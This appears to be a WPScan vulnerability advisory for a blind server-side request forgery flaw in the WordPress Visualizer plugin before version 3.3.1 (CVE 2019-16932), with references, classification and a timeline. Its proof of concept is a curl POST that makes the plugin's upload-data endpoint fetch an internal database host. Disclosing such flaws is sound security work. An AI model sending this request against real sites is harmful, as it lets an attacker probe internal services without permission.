Visualizer < 3.3.1 - Blind Server-Side Request Forgery (SSRF)



Description
This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint.
Proof of Concept
curl -i -s -X $'POST' \
    -H $'Host: 192.168.158.128:8000' \
    --data-binary $'{\"url\":\"http://db:3306\"}' \
    $'http://192.168.158.128:8000/wp-json/visualizer/v1/upload-data'

See the references for more details

Affects Plugin

fixed in version 3.3.1

References

CVE 2019-16932
URL https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf

Classification

Type SSRF
OWASP Top 10 A1: Injection
CWE CWE-918

Miscellaneous

Original Researcher Nathan Davison
Submitter Website https://nathandavison.com
Submitter Twitter nj_dav
Views 4200
Verified No
WPVDB ID 9892

Timeline

Publicly Published 2019-09-28 (23 days ago)
Added 2019-09-28 (23 days ago)
Last Updated 2019-10-05 (16 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin